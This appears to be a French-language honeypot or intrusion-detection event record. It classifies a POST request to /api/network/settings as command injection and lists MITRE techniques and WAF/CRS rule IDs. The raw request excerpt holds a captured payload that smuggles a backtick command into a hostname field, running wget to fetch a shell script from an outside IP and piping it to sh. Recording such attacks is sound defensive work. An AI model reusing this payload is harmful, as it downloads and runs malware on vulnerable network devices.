/api/network/settings
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
k8s-api
Payload (extrait)
POST /api/network/settings HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 166
Requête brute (extrait)
POST /api/network/settings HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 166 Connection: close hostname=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s russ;busybox wget http://91.92.40.118/wget.s |
|||||||